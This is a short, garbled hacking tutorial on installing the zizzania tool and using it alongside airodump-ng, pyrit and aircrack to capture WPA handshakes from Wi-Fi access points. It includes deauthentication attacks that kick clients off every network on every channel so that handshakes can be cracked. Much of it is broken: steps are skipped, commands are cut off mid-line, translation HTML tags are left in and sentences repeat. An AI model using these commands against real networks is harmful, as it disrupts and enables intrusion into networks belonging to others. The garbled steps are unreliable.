1) git clone cd zizzania
3) for debian/kali/parrot...
> sudo apt-get install libpcap-dev
🦑 For macOS systems (Homebrew):
1)brew install libpcap
3)make -f config.Makefile
5)The installation process is not mandatory, zizzania can be run from the src directory. Just in case:
> make install
> make uninstall
6) now Channel switching must be performed manually:
ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
7)sudo airport --disassociate
8)sudo airport --channel=<channel>
🦑 We re ready now :
1) Suppose we are interested in an access point with BSSID AA: BB: CC: DD: EE: FF, but very rarely (once a day, once a week, once a month) clients connect to it.
We can run zizzania on the network interface -i wlp2s0 , restrict listening to the sixth channel -c 6 (if we specify the channel, the program switches the network interface to monitoring mode), specify the access point we are interested in -b AA: BB: CC: DD: EE: FF and the file to which the intercepted handshakes -w out.pcap should be written :
<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">sudo zizzania -i wl
2) Suppose we want to listen to a specific channel and we are interested in all access points on it. Then the command will look something like this (we did not specify the -b switch with the BSSID of any AP):
<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">sudo zizzania -i wlp2s0 -c 1 -2 -w zizza / out5</font></font>
3) We want to capture handshakes from all access points of all channels. At the same time,
> use a deauthentication attack to get the maximum possible handshakesWe want to capture handshakes from all access points of all channels. At the same time, we want to use a deauthentication attack to get the maximum possible handshakes
🦑 Lets run :
>use the --berlin 1200 option . It is needed only so that access points do not crash too quickly from the screen (this does not affect the work in any way)
2) sudo airodump-ng wlp2s0 -f 30000 -w hndshk/auto5 --berlin 1200
When starting zizzania, I specify only the name of the wireless interface on which it will work (send deauthentication packets)
3) sudo zizzania -i wlp2s0
4) pyrit -r "hndshk/auto5-01.cap" analyze
(note auto5... its name of pcapfile )
5) finally use any packets in aircrack & Wait till done
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